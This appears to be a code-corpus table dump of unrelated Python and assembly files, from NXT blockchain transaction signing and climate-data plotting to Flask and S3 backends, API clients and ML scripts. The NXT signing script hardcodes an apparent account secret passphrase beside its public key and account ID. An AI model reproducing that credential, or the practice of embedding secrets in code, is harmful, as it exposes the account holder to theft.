index int64 0 1,000k | blob_id stringlengths 40 40 | code stringlengths 7 10.4M |
|---|---|---|
996,800 | 1bd70b68afbf23af22673ffe3203e643e7eef276 | """
The unsigned transaction of setAccount Property (test1, value1):
{
"transactionJSON": {
"senderPublicKey": "6282332ff83fb3ce267157e5a7d04921f0b7f719aad5bf2117561c2ca7850d19",
"feeNQT": "100000000",
"type": 1,
"version": 1,
"phased": false,
"ecBlockId": "6827938886709383368",
"attachment": {
"property": "test1",
"value": "value1",
"version.AccountProperty": 1
},
"senderRS": "NXT-XWQY-C2MJ-JPL8-F4BW2",
"subtype": 10,
"amountNQT": "0",
"sender": "15019823959905333982",
"recipientRS": "NXT-XWQY-C2MJ-JPL8-F4BW2",
"recipient": "15019823959905333982",
"ecBlockHeight": 1556740,
"deadline": 1,
"timestamp": 127003043,
"height": 2147483647
},
"unsignedTransactionBytes": "011aa3e9910701006282332ff83fb3ce267157e5a7d04921f0b7f719aad5bf2117561c2ca7850d19def20e27502271d0000000000000000000e1f505000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000004c11700c89063d23db6c15e010574657374310676616c756531",
"broadcasted": false,
"requestProcessingTime": 10
}
{
"signatureHash": "4892f9904048c1a2ddd3125340b4e068255c284ff52e5f462d8527fa213559c3",
"transactionJSON": {
"senderPublicKey": "6282332ff83fb3ce267157e5a7d04921f0b7f719aad5bf2117561c2ca7850d19",
"signature": "2719adcbd0bb05831a2450bf3c4890e27a6560baa2323273260199f6ba8bb0099d2ea4e9225c6f02dbf8a882dbc92283f56de247189d3c2f9ee1082bd243f526",
"feeNQT": "100000000",
"type": 1,
"fullHash": "9338130cf38d7055f25d8c2eeb5bafc3dcc9bd6f9ac224956fc45ff70314da23",
"version": 1,
"phased": false,
"ecBlockId": "6827938886709383368",
"signatureHash": "4892f9904048c1a2ddd3125340b4e068255c284ff52e5f462d8527fa213559c3",
"attachment": {
"property": "test1",
"value": "value1",
"version.AccountProperty": 1
},
"senderRS": "NXT-XWQY-C2MJ-JPL8-F4BW2",
"subtype": 10,
"amountNQT": "0",
"sender": "15019823959905333982",
"recipientRS": "NXT-XWQY-C2MJ-JPL8-F4BW2",
"recipient": "15019823959905333982",
"ecBlockHeight": 1556740,
"deadline": 1,
"transaction": "6156576765634623635",
"timestamp": 127003043,
"height": 2147483647
},
"verify": true,
"requestProcessingTime": 12,
"transactionBytes": "011aa3e9910701006282332ff83fb3ce267157e5a7d04921f0b7f719aad5bf2117561c2ca7850d19def20e27502271d0000000000000000000e1f5050000000000000000000000000000000000000000000000000000000000000000000000002719adcbd0bb05831a2450bf3c4890e27a6560baa2323273260199f6ba8bb0099d2ea4e9225c6f02dbf8a882dbc92283f56de247189d3c2f9ee1082bd243f5260000000004c11700c89063d23db6c15e010574657374310676616c756531",
"fullHash": "9338130cf38d7055f25d8c2eeb5bafc3dcc9bd6f9ac224956fc45ff70314da23",
"transaction": "6156576765634623635"
}
Java sequence for signing :
digest.reset();
byte[] P = new byte[32];
byte[] s = new byte[32];
Curve25519.keygen(P, s, digest.digest(secretPhrase.getBytes("UTF-8")));
byte[] m = digest.digest(message);
System.out.println("sign --> (m) "+m+" "+toHexString(m));
digest.update(m);
byte[] x = digest.digest(s);
System.out.println("sign --> (x) digest(s) "+x+" "+toHexString(x));
byte[] Y = new byte[32];
Curve25519.keygen(Y, null, x);
digest.update(m);
byte[] h = digest.digest(Y);
System.out.println("sign --> (h) digest(Y) "+h+" "+toHexString(h));
byte[] v = new byte[32];
Curve25519.sign(v, h, x, s);
System.out.println("sign --> (v) sign(v, h, x, s) "+v+" "+toHexString(v));
System.out.println("sign --> (h) sign(v, h, x, s) "+h+" "+toHexString(h));
System.arraycopy(v, 0, signature, 0, 32);
System.arraycopy(h, 0, signature, 32, 32);
System.out.println("sign --> (signature) arraycopy( .. v, h) "+signature+" "+toHexString(signature));
if (!Curve25519.isCanonicalSignature(signature)) {
System.out.println("Signature is not canonical");
}
"""
import transactions.signTransactionOffline as sto
from hashlib import sha256
from curve25519.ToHexString import ToHexString
from curve25519.ParseHexString import ParseHexString as ParseHexString
## My First Account
me = "NXT-XWQY-C2MJ-JPL8-F4BW2"
sP = "pass dig enough trace frighten foul beaten explain knowledge yeah approach spider"
## sP = "this is a sample of secret pass phrase for test purpose"
pK="6282332ff83fb3ce267157e5a7d04921f0b7f719aad5bf2117561c2ca7850d19"
unsignedTransactionBytes = "011aa3e9910701006282332ff83fb3ce267157e5a7d04921f0b7f719aad5bf2117561c2ca7850d19def20e27502271d0000000000000000000e1f505000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000004c11700c89063d23db6c15e010574657374310676616c756531"
welldone = sto.SignTransactionOffline(sP, unsignedTransactionBytes)
welldone.run()
print("Signature ", welldone.getSignature())
#print("P ", P)
|
996,801 | d4f3a0e5e10d877778b7c3735f0c0bedf82a4f63 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from __future__ import print_function
import pylab as plt
import netCDF4
import datetime
import numpy as np
"""
Testing the gridded obs-data as forcing data for SnowHow-Crocus modelling.
Author: kmunve
"""
precip_f = r"..\Test\Data\snowhow_pilot\seNorge_v2_0_PREC1h_grid_2015011221_2015011221.nc"
precip_mf = r"..\Test\Data\snowhow_pilot\seNorge_v2_0_PREC1h_grid_*.nc"
temp_f = r"..\Test\Data\snowhow_pilot\seNorge_v2_0_TEMP1h_grid_2015011221.nc"
snowrain_f = r"..\Test\Data\snowhow_pilot\snowrain_only_2015011221.nc"
forc_obs_f = r"..\Test\Data\FORCING_obsgrid.nc"
forc_arome_f = r"..\Test\Data\snowhow_pilot\har25_00_20150112.nc"
X = 45
Y = 1185
precip_nc = netCDF4.Dataset(precip_f, 'r')
temp_nc = netCDF4.Dataset(temp_f, 'r')
snowrain_nc = netCDF4.Dataset(snowrain_f, 'r')
forc_arome_nc = netCDF4.Dataset(forc_arome_f, 'r')
forc_obs_nc = netCDF4.Dataset(forc_obs_f, 'r')
precip_v = precip_nc.variables['precipitation_amount'] ## mm
temp_v = temp_nc.variables['temperature'] ## Celsius
snowrain_v = snowrain_nc.variables['precipitation_amount']
precip_obs_v = forc_obs_nc.variables["Rainf"]
lat_obs = forc_obs_nc.variables["LAT"][:]
lon_obs = forc_obs_nc.variables["LON"][:]
time_obs = forc_obs_nc.variables["time"][:]
time_v = precip_nc.variables['time']
t_p = netCDF4.num2date(time_v[0], time_v.units)
time_v = temp_nc.variables['time']
t_t = netCDF4.num2date(time_v[0], time_v.units)
if t_t == t_p:
print("Time matches")
else:
print("Time mismatch")
rainf_arome_v = forc_arome_nc.variables["precipitation_amount_acc"]
rainf_arome = rainf_arome_v[:].squeeze() # kg/m2 = mm
snowf_arome_v = forc_arome_nc.variables["lwe_thickness_of_snowfall_amount_acc"]
snowf_arome = rainf_arome_v[:].squeeze() # kg/m2 = mm
time_arome = netCDF4.num2date(forc_arome_nc.variables["time"][:], forc_arome_nc.variables["time"].units)
precip = precip_v[:].squeeze() #/ 3600.0
snowrain = snowrain_v[:].squeeze()
temp = temp_v[:].squeeze()
rainf = np.ma.masked_where((temp <= 0.5), precip)
snowf = np.ma.masked_where((temp > 0.5), precip)
diff = rainf - snowrain
N_arome = 21
'''
f, (ax_rf, ax_sf, ax_rf_sf) = plt.subplots(1, 3)
ax_rf.imshow(rainf_arome[N_arome, :, :])
ax_rf.set_title("Rain fall (AROME): {0}".format(time_arome[N_arome]))
#plt.colorbar()
ax_sf.imshow(snowf_arome[N_arome, :, :])
ax_sf.set_title("Snow fall (AROME): {0}".format(time_arome[N_arome]))
#plt.colorbar()
ax_rf_sf.imshow(rainf_arome[N_arome, :, :] - snowf_arome[N_arome, :, :])
ax_rf_sf.set_title("Diff. (AROME): {0}".format(time_arome[N_arome]))
'''
f, ([ax_obs, ax_aro], [ax_cobs, ax_caro]) = plt.subplots(2, 2)
im_obs = ax_obs.imshow(precip)
ax_obs.set_title("Precip (obs.grid): {0}".format(t_p))
plt.colorbar(im_obs, cax=ax_cobs, orientation="horizontal")
im_aro = ax_aro.imshow(rainf_arome[21, :, :])
ax_aro.set_title("Precip (AROME): {0}".format(time_arome[21]))
plt.colorbar(im_aro, cax=ax_caro, orientation="horizontal")
plt.figure()
plt.imshow(snowf)
plt.title("Snow fall: {0}".format(t_p))
plt.colorbar()
f, (ax1, ax2, ax3) = plt.subplots(1, 3)
ax1.imshow(rainf)
ax1.set_title("Precip (grid): {0}".format(t_p))
ax2.imshow(snowrain)
ax2.set_title("Precip (conv): {0}".format(t_p))
ax3.imshow(diff)
ax3.set_title("Difference: {0}".format(t_p))
precip_nc_mf = netCDF4.MFDataset(precip_mf)
precip_v_mf = precip_nc_mf.variables['precipitation_amount'] ## mm
precip = precip_v_mf[:].squeeze() / 3600.0
time_v_mf = precip_nc_mf.variables['time']
t_p_mf = netCDF4.num2date(time_v_mf[:], time_v_mf.units)
plt.figure()
plt.plot(t_p_mf, precip[:, Y, X])
plt.show()
|
996,802 | 55ee354ae04fa2a29b471528e601966f158d3ef9 | import matplotlib.pyplot as plt
def loss(history):
plt.plot(history.history['loss'],'b')
plt.plot(history.history['val_loss'],'r')
plt.title('Collaborative Filter Loss')
plt.ylabel('Loss')
plt.xlabel('Epoch')
plt.legend(['Train','Validation'],loc='upper right')
plt.show() |
996,803 | 9f8eac69a73d32239586841251d5d0649503d5b5 | """
AWS S3 Storage backends.
We override the backends provided by django-storages to add some small pieces
that we need to make our project to work as we want. For example, using
ManifestFilesMixin for static files and OverrideHostnameMixin to make it work
in our Docker Development environment.
"""
# Disable abstract method because we are not overriding all the methods
# pylint: disable=abstract-method
from django.conf import settings
from django.contrib.staticfiles.storage import ManifestFilesMixin
from django.core.exceptions import ImproperlyConfigured
from storages.backends.s3boto3 import S3Boto3Storage
from readthedocs.builds.storage import BuildMediaStorageMixin
from .mixins import OverrideHostnameMixin, S3PrivateBucketMixin
class S3BuildMediaStorage(BuildMediaStorageMixin, OverrideHostnameMixin, S3Boto3Storage):
"""An AWS S3 Storage backend for build artifacts."""
bucket_name = getattr(settings, 'S3_MEDIA_STORAGE_BUCKET', None)
override_hostname = getattr(settings, 'S3_MEDIA_STORAGE_OVERRIDE_HOSTNAME', None)
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
if not self.bucket_name:
raise ImproperlyConfigured(
'AWS S3 not configured correctly. '
'Ensure S3_MEDIA_STORAGE_BUCKET is defined.',
)
class S3BuildCommandsStorage(S3PrivateBucketMixin, S3Boto3Storage):
"""An AWS S3 Storage backend for build commands."""
bucket_name = getattr(settings, 'S3_BUILD_COMMANDS_STORAGE_BUCKET', None)
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
if not self.bucket_name:
raise ImproperlyConfigured(
'AWS S3 not configured correctly. '
'Ensure S3_BUILD_COMMANDS_STORAGE_BUCKET is defined.',
)
class S3StaticStorage(OverrideHostnameMixin, ManifestFilesMixin, S3Boto3Storage):
"""
An AWS S3 Storage backend for static media.
* Uses Django's ManifestFilesMixin to have unique file paths (eg. core.a6f5e2c.css)
"""
bucket_name = getattr(settings, 'S3_STATIC_STORAGE_BUCKET', None)
override_hostname = getattr(settings, 'S3_STATIC_STORAGE_OVERRIDE_HOSTNAME', None)
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
if not self.bucket_name:
raise ImproperlyConfigured(
'AWS S3 not configured correctly. '
'Ensure S3_STATIC_STORAGE_BUCKET is defined.',
)
self.bucket_acl = 'public-read'
self.default_acl = 'public-read'
self.querystring_auth = False
class S3BuildEnvironmentStorage(S3PrivateBucketMixin, BuildMediaStorageMixin, S3Boto3Storage):
bucket_name = getattr(settings, 'S3_BUILD_ENVIRONMENT_STORAGE_BUCKET', None)
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
if not self.bucket_name:
raise ImproperlyConfigured(
'AWS S3 not configured correctly. '
'Ensure S3_BUILD_ENVIRONMENT_STORAGE_BUCKET is defined.',
)
|
996,804 | 9845b7909d0ce7c5c324edfc823cf87d630b0ba9 | #!/usr/bin/env python
import calendar
import datetime
import functools
import importlib
import uuid
from flask import jsonify, request
import minion.backend.utils as backend_utils
import minion.backend.tasks as tasks
from minion.backend.app import app
from minion.backend.views.base import api_guard
from minion.backend.models import db, User, Group, Site, Plan, Plugin, Workflow
import json
def _plan_description(plan):
return {
'description': plan['description'],
'name': plan['name'],
'workflow': plan['workflow'],
'created' : plan['created'] }
def get_plan_by_plan_name(plan_name):
return Plan.get_plan(plan_name)
def get_sanitized_plans():
return [sanitize_plan(_plan_description(plan)) for plan in plans.find()]
def _check_plan_by_email(email, plan_name):
plan = plans.find_one({'name': plan_name})
if not plan:
return False
sitez = sites.find({'plans': plan_name})
if sitez.count():
matches = 0
for site in sitez:
groupz = groups.find({'users': email, 'sites': site['url']})
if groupz.count():
matches += 1
return matches
def get_plans_by_email(email):
user = User.get_user(email)
plans_by_site = map(lambda x:Site.get_site_by_url(x).plans, user.sites())
plans = []
for planlist in plans_by_site:
for plan in planlist:
if not plan in plans:
plans.append(plan)
return map(lambda x : x.dict(), plans)
def permission(view):
@functools.wraps(view)
def has_permission(*args, **kwargs):
email = request.args.get('email')
if email:
user = User.get_user(email)
if not user:
return jsonify(success=False, reason='User does not exist.')
if user.role == 'user':
plan_name = request.view_args['plan_name']
if not _check_plan_by_email(email, plan_name):
return jsonify(success=False, reason="Plan does not exist.")
return view(*args, **kwargs) # if groupz.count is not zero, or user is admin
return has_permission
def sanitize_plan(plan):
return plan.dict()
def _split_plugin_class_name(plugin_class_name):
e = plugin_class_name.split(".")
return '.'.join(e[:-1]), e[-1]
def _import_plugin(plugin_class_name):
package_name, class_name = _split_plugin_class_name(plugin_class_name)
plugin_module = importlib.import_module(package_name, class_name)
return getattr(plugin_module, class_name)
def create_workflows_from_json(workflow):
""" Ensure plan workflow contain valid structure. """
results = []
for flow in workflow:
if not 'plugin_name' in flow:
return None
if not 'description' in flow:
return None
if not 'configuration' in flow:
return None
for flow in workflow:
wf = Workflow()
wf.plugin_name = flow['plugin_name']
wf.configuration = json.dumps(flow['configuration'])
wf.description = flow['description']
results.append(wf)
return results
def _check_plan_exists(plan_name):
return plans.find_one({'name': plan_name}) is not None
# API Methods to manage plans
#
# Return a list of available plans. Plans are global and not
# limited to a specific user.
#
# GET /plans
#
# Returns an array of plan:
#
# { "success": true,
# "plans": [ { "description": "Run an nmap scan",
# "name": "nmap" },
# ... ] }
#
@app.route("/plans", methods=['GET'])
@api_guard
def get_plans():
name = request.args.get('name')
if name:
plan = Plan.get_plan(name)
if not plan:
return jsonify(success=False, reason="no-such-plan")
else:
return jsonify(success=True, plans=[plan.dict()])
else:
email = request.args.get('email')
if email:
plans = get_plans_by_email(email)
else:
plans = map(lambda x : x.dict(), Plan.query.all())
return jsonify(success=True, plans=plans)
#
# Delete an existing plan
#
# DELETE /plans/<plan_name>
#
@app.route('/plans/<plan_name>', methods=['DELETE'])
@api_guard
def delete_plan(plan_name):
plan = Plan.get_plan(plan_name)
if not plan:
return jsonify(success=False, reason="Plan does not exist.")
# XX assess the impact of deleting a plan against existing scans?
db.session.delete(plan)
db.session.commit()
return jsonify(success=True)
#
# Create a new plan
#
@app.route("/plans", methods=['POST'])
@api_guard('application/json')
def create_plan():
plan = request.json
# Verify incoming plan
if Plan.get_plan(plan['name']) is not None:
return jsonify(success=False, reason='plan-already-exists')
workflows = create_workflows_from_json(plan['workflow'])
if not workflows:
return jsonify(success=False, reason='invalid-plan-exists')
# Create the plan
new_plan = Plan()
new_plan.name = plan['name']
new_plan.description = plan['description']
db.session.add(new_plan)
db.session.commit()
for workflow in workflows:
db.session.add(workflow)
new_plan.workflows.append(workflow)
db.session.commit()
plan = Plan.get_plan(new_plan.name)
# Return the new plan
if not plan:
return jsonify(success=False)
return jsonify(success=True, plan=sanitize_plan(plan))
#
# Update a plan
#
@app.route('/plans/<plan_name>', methods=['POST'])
@api_guard
@permission
def update_plan(plan_name):
plan = Plan.get_plan(plan_name)
if not plan:
return jsonify(success=False, reason='no-such-plan')
new_plan = request.json
new_workflow = create_workflows_from_json(new_plan['workflow'])
if not new_workflow:
return jsonify(success=False, reason='invalid-plan')
plan.name = new_plan.get("name", plan.name)
plan.description = new_plan.get("description", plan.description)
old_flows = map(lambda x: x, plan.workflows)
for flow in old_flows:
plan.workflows.remove(flow)
for new_flow in new_workflow:
db.session.add(new_flow)
plan.workflows.append(new_flow)
db.session.commit()
return jsonify(success=True, plan=sanitize_plan(Plan.get_plan(plan.name)))
#
# Return a single plan description. Takes the plan name.
#
# GET /plans/:plan_name
#
# Returns a JSON structure that contains the complete plan
#
# { "success": true,
# "plan": { "description": "Run an nmap scan",
# "name": "nmap",
# "workflow": [ { "configuration": {},
# "description": "Run the NMAP scanner.",
# "plugin": { "version": "0.2",
# "class": "minion.plugins.nmap.NMAPPlugin",
# "weight": "light",
# "name": "NMAP" } } ] }
#
@app.route("/plans/<plan_name>", methods=['GET'])
@api_guard
@permission
def get_plan(plan_name):
plan = get_plan_by_plan_name(plan_name)
if not plan:
return jsonify(success=False, reason="Plan does not exist")
return jsonify(success=True, plan=sanitize_plan(plan))
|
996,805 | 463c16a1c980915894b73fc8ad3b5db0bdde9816 | from urllib.request import urlopen
def fetch_words_from_url():
with urlopen('http://sixty-north.com/c/t.txt') as story:
story_word = []
for line in story:
for word in line.split():
story_word.append(word.decode('utf-8'))
print(story_word)
if(__name__ == '__main__'): # __name__ is special attribute which evaluates to __main__ or actual module name
fetch_words_from_url() |
996,806 | 5d869948e75a17bdc0b05a3fe122cbb5422c1f99 | from __future__ import print_function
def check_hash(giv_str):
h = 7
letters = "acdegilmnoprstuw"
for i in giv_str:
h = h * 37 + letters.index(i)
return h
def reverse_hash(h):
letters = "acdegilmnoprstuw"
ind = []
i = 0
while h > 37:
ind.append(int(h % 37))
h /= 37
broken_word = ""
for i in reversed(ind):
broken_word += letters[i]
return broken_word
if __name__ == '__main__':
print(check_hash(reverse_hash(930846109532517)) == 930846109532517)
|
996,807 | fc0dfa538824b623ea1d673153669100eb51f4c1 | from math import ceil
from typing import List, Optional, Tuple
import numpy as np
import pandas as pd
from time_series_expectations.generator.daily_time_series_generator import (
DailyTimeSeriesGenerator,
)
from time_series_expectations.generator.time_series_generator import TrendParams
class HourlyTimeSeriesGenerator(DailyTimeSeriesGenerator):
"""Generate an hourly time series with trend, seasonality, and outliers."""
def _generate_hourly_seasonality(
self,
time_range: np.ndarray,
hourly_seasonality_params: List[Tuple[float, float]],
) -> np.ndarray:
"""Generate an annual seasonality component for a time series."""
return sum(
[
alpha * np.cos(2 * np.pi * (i + 1) * time_range / 24)
+ beta * np.sin(2 * np.pi * (i + 1) * time_range / 24)
for i, (alpha, beta) in enumerate(hourly_seasonality_params)
]
)
def _generate_hourly_time_series(
self,
size: int,
hourly_seasonality: float,
hourly_seasonality_params: Optional[List[Tuple[float, float]]] = None,
trend_params: Optional[List[TrendParams]] = None,
weekday_dummy_params: Optional[List[float]] = None,
annual_seasonality_params: Optional[List[Tuple[float, float]]] = None,
holiday_alpha: float = 3.5,
outlier_alpha: float = 2.5,
noise_scale: float = 1.0,
):
"""Generate an hourly time series."""
if hourly_seasonality_params is None:
# Create 10 random hourly seasonality parameters
hourly_seasonality_params = [
(
np.random.normal() / 100,
np.random.normal() / 100,
)
for i in range(4)
]
time_range = np.arange(size)
hourly_seasonality_series = (
self._generate_hourly_seasonality(
time_range=time_range,
hourly_seasonality_params=hourly_seasonality_params,
)
* hourly_seasonality
)
hourly_outliers = self._generate_posneg_pareto(outlier_alpha, size)
daily_time_series = self._generate_daily_time_series(
size=ceil(size / 24),
trend_params=trend_params,
weekday_dummy_params=weekday_dummy_params,
annual_seasonality_params=annual_seasonality_params,
holiday_alpha=holiday_alpha,
outlier_alpha=1000000, # outlier_alpha,
noise_scale=noise_scale,
)
return (
np.exp(hourly_seasonality_series) * np.repeat(daily_time_series, 24)[:size]
+ hourly_outliers
)
def generate_df(
self,
size: Optional[int] = 90 * 24, # 90 days worth of data
start_date: Optional[str] = "2018-01-01",
hourly_seasonality: float = 1.0,
hourly_seasonality_params: Optional[List[Tuple[float, float]]] = None,
trend_params: Optional[List[TrendParams]] = None,
weekday_dummy_params: Optional[List[float]] = None,
annual_seasonality_params: Optional[List[Tuple[float, float]]] = None,
holiday_alpha: float = 3.5,
outlier_alpha: float = 2.5,
noise_scale: float = 1.0,
) -> pd.DataFrame:
"""Generate a time series as a pandas dataframe.
Keyword Args:
size: The number of days in the time series.
start_date: The start date of the time series.
trend_params: A list of trend parameters corresponding to cutpoints in the time series.
weekday_dummy_params: A list of weekday dummy parameters. Should be a list of length 7, with each day corresponding to the average difference in the time series on that day.
annual_seasonality_params: A list of annual seasonality parameters used to create a cyclic component in the time series.
holiday_alpha: The alpha parameter for the pareto distribution used to generate holiday effects.
outlier_alpha: The alpha parameter for the pareto distribution used to generate outlier effects.
noise_scale: The scale parameter for the standard deviation of the normal distribution used to generate noise.
Returns:
A pandas dataframe with a date column and a time series column.
Notes:
* Holiday and outlier effects are generated using a pareto distribution. The alpha parameter controls the shape of the distribution. A higher alpha value will result in more extreme holiday and outlier effects.
* Holidays don't correspond to actual holidays. Instead, they are generated by randomly selecting days in the time series.
* Annual seasonality is generated by Fourier series. The number of fourier terms is determined by the length of the annual_seasonality_params list. The first element of each tuple in the list is the amplitude of the sine term, and the second element is the amplitude of the cosine term.
"""
return pd.DataFrame(
{
"ds": pd.date_range(start_date, periods=size, freq="60min"),
"y": self._generate_hourly_time_series(
size=size,
hourly_seasonality=hourly_seasonality,
hourly_seasonality_params=hourly_seasonality_params,
trend_params=trend_params,
weekday_dummy_params=weekday_dummy_params,
annual_seasonality_params=annual_seasonality_params,
holiday_alpha=holiday_alpha,
outlier_alpha=outlier_alpha,
noise_scale=noise_scale,
),
}
)
|
996,808 | 2c4b2519b277926b42327e40a92807faf645f222 | from .iterator import Iterator
from .map import map
|
996,809 | 71a24f817e08a41dd2f0acbd2154d72dd64f2b89 | //push constant 0
@0
D=A
@SP
A=M
M=D
@SP
M=M+1
//pop local 0
@LCL
D=M
@0
D=A+D
@R13
M=D
@SP
M=M-1
A=M
D=M
@R13
A=M
M=D
//label LOOP_START
(LOOP_START)
//push argument 0
@ARG
D=M
@0
A=A+D
D=M
@SP
A=M
M=D
@SP
M=M+1
//push local 0
@LCL
D=M
@0
A=A+D
D=M
@SP
A=M
M=D
@SP
M=M+1
//add
@SP
M=M-1
A=M
D=M
A=A-1
M=D+M
//pop local 0
@LCL
D=M
@0
D=A+D
@R13
M=D
@SP
M=M-1
A=M
D=M
@R13
A=M
M=D
//push argument 0
@ARG
D=M
@0
A=A+D
D=M
@SP
A=M
M=D
@SP
M=M+1
//push constant 1
@1
D=A
@SP
A=M
M=D
@SP
M=M+1
//sub: sub
@SP
M=M-1
A=M
D=M
A=A-1
M=M-D
//pop argument 0
@ARG
D=M
@0
D=A+D
@R13
M=D
@SP
M=M-1
A=M
D=M
@R13
A=M
M=D
//push argument 0
@ARG
D=M
@0
A=A+D
D=M
@SP
A=M
M=D
@SP
M=M+1
//if-gotoLOOP_START
@SP
M=M-1
A=M
D=M
@LOOP_START
D;JNE
//push local 0
@LCL
D=M
@0
A=A+D
D=M
@SP
A=M
M=D
@SP
M=M+1
|
996,810 | 4d88712fd3ca77ba5eac9355bc4c64e47f5d6f0c |
from keras.layers import Input, Lambda, Dense, Flatten
from keras.layers import AveragePooling2D, MaxPooling2D
from keras.layers.convolutional import Conv2D
from keras.models import Model, Sequential
from keras.applications.vgg16 import VGG16
from keras.applications.vgg16 import preprocess_input
from keras.preprocessing import image
from skimage.transform import resize
import keras.backend as K
import numpy as np
import matplotlib.pyplot as plt
from Optimizer import VGG16_AvgPool, VGG16_AvgPool_CutOff, unpreprocess, scale_img
from Styling import gram_matrix, style_loss, minimize
from scipy.optimize import fmin_l_bfgs_b
# load the content image
def load_img_and_preprocess(path, shape=None):
img = image.load_img(path, target_size=shape)
x = image.img_to_array(img)
x = np.expand_dims(x, axis=0)
x = preprocess_input(x)
return x
content_img = load_img_and_preprocess('../data/images/image_3.jpg')
h, w = content_img.shape[1:3]
style_img = load_img_and_preprocess(
'../data/images/style_2.jpg',
(h, w)
)
batch_shape = content_img.shape
shape = content_img.shape[1:]
vgg = VGG16_AvgPool(shape)
content_model = Model(vgg.input, vgg.layers[13].get_output_at(1))
content_target = K.variable(content_model.predict(content_img))
symbolic_conv_outputs = [
layer.get_output_at(1) for layer in vgg.layers \
if layer.name.endswith('conv1')
]
style_model = Model(vgg.input, symbolic_conv_outputs)
style_layers_outputs = [K.variable(y) for y in style_model.predict(style_img)]
style_weights = [0.2,0.4,0.3,0.5,0.2]
loss = K.mean(K.square(content_model.output - content_target))
for w, symbolic, actual in zip(style_weights, symbolic_conv_outputs, style_layers_outputs):
loss += w * style_loss(symbolic[0], actual[0])
grads = K.gradients(loss, vgg.input)
get_loss_and_grads = K.function(
inputs=[vgg.input],
outputs=[loss] + grads
)
def get_loss_and_grads_wrapper(x_vec):
l, g = get_loss_and_grads([x_vec.reshape(*batch_shape)])
return l.astype(np.float64), g.flatten().astype(np.float64)
final_img = minimize(get_loss_and_grads_wrapper, 10, batch_shape)
plt.imshow(scale_img(final_img))
plt.show() |
996,811 | 80606e29e34e7de2b4175d931234f84775f15932 | __author__ = 'avbelkum'
import json
import requests
class liquidplanner():
base_uri = 'https://app.liquidplanner.com/api'
workspace_id = None
email = None
password = None
session = None
account_id = None
def __init__(self, email, password):
self.email = email
self.password = password
def get_workspace_id(self):
return self.workspace_id
def set_workspace_id(self, workspace_id):
self.workspace_id = workspace_id
def set_account_id(self, account_id):
self.account_id = account_id
def get(self, uri, options={}):
return requests.get(self.base_uri + uri,
data=options,
headers={'Content-Type': 'application/json'},
auth=(self.email, self.password)
)
def post(self, uri, options={}):
return requests.post(self.base_uri + uri,
data=options,
headers={'Content-Type': 'application/json'},
auth=(self.email, self.password)
)
def put(self, uri, options={}):
return requests.put(self.base_uri + uri,
data=options,
headers={'Content-Type': 'application/json'},
auth=(self.email, self.password)
)
def account(self):
return json.loads(self.get('/account').content)
def workspaces(self):
return json.loads(self.get('/workspaces').content)
def projects(self):
return json.loads(self.get('/workspaces/' + str(self.workspace_id) +
'/projects').content)
def tasks(self):
return json.loads(self.get('/workspaces/' + str(self.workspace_id) +
'/tasks').content)
def create_task(self, data):
return json.loads(self.post('/workspaces/' + str(self.workspace_id) +
'/tasks',
json.dumps({'task': data})).content)
def update_task(self, data):
return json.loads(self.put('/workspaces/' + str(self.workspace_id) +
'/tasks/' + str(data['id']),
json.dumps({'task': data})).content)
def timesheets(self):
return json.loads(self.get('/workspaces/' + str(self.workspace_id) +
'/timesheets?member_id=' + str(
self.account_id)).content)
def timesheet(self, sheet_id):
return json.loads(self.get('/workspaces/' + str(self.workspace_id) +
'/timesheets/' + str(sheet_id)).content)
def project_timesheets(self, project_id):
return json.loads(self.get('/workspaces/' + str(self.workspace_id) +
'/timesheets?project_id=' + str(
project_id)).content)
def track_time(self, task_id, act_id, day, hours):
return json.loads(self.post('/workspaces/' + str(self.workspace_id) +
'/tasks/' + str(task_id) + '/track_time',
json.dumps({'work': hours,
'activity_id': act_id,
'work_performed_on': day
})).content)
|
996,812 | d8b2c56d997a9f6eab054325e118f1a2e5826dbb | # -*- coding: utf-8 -*-
from app.engine_v1 import app_config, logger, image_process_wrap
from app.engine_v1.worker import BaseFuncWorker
from app.engine_v1.ai_modules.cartoongan_pt import adapter as cartoongan_pt_adapter
class CartoonganPtHayaoFuncWorker(BaseFuncWorker):
"""CartoonganPt Hayao 引擎子进程
"""
def __init__(self, daemon=True):
super(CartoonganPtHayaoFuncWorker, self).__init__(daemon)
# 引擎功能函数注册信息
self._func_info_list = [{
"func_group": "__art_cartoon", # 必须在预定义类型中,否则将被拒绝注册
"func_list": [{
"name": "hyo", "vip": 0,
"icon": "/static/ui_data/modules/ctg/hayao.jpg",
"func_class": "fc_art",
"func_name": "hayao",
"func_params": []
}]
}]
# 以下注册 FUN 标签页功能
'''
self._func_info_list.append({
"func_group": "__fun", # 必须在预定义类型中,否则将被拒绝注册
"func_list": [{
"name": "hyo", "vip": 0,
"sex": "all",
"icon": "/static/ui_data/modules/ctg/hayao.jpg",
"func_class": "fc_fun",
"func_name": "hayao",
"func_params": []
}]
})
'''
self._task_filters = self._get_tasks_filter()
self._func_process_image = cartoongan_pt_adapter.process_image
self.logger.info("subprocess {} init DONE".format(self.name))
def _engine_init(self):
self._engine = cartoongan_pt_adapter.init_model(
gpu_id=app_config.ENGINE_CONFIG['cartoongan_pt']['gpu_id'],
style='Hayao')
class CartoonganPtHosodaFuncWorker(BaseFuncWorker):
"""CartoonganPt Hosoda 引擎子进程
"""
def __init__(self, daemon=True):
super(CartoonganPtHosodaFuncWorker, self).__init__(daemon)
# 引擎功能函数注册信息
self._func_info_list = [{
"func_group": "__art_cartoon", # 必须在预定义类型中,否则将被拒绝注册
"func_list": [{
"name": "hsd", "vip": 1,
"icon": "/static/ui_data/modules/ctg/hosoda.jpg",
"func_class": "fc_art",
"func_name": "hosoda",
"func_params": []
}]
}]
# 以下注册 FUN 标签页功能
self._func_info_list.append({
"func_group": "__fun", # 必须在预定义类型中,否则将被拒绝注册
"func_list": [{
"name": "hsd", "vip": 0,
"sex": "all",
"icon": "/static/ui_data/modules/ctg/hosoda.jpg",
"func_class": "fc_fun",
"func_name": "hosoda",
"func_params": []
}]
})
self._task_filters = self._get_tasks_filter()
self._func_process_image = cartoongan_pt_adapter.process_image
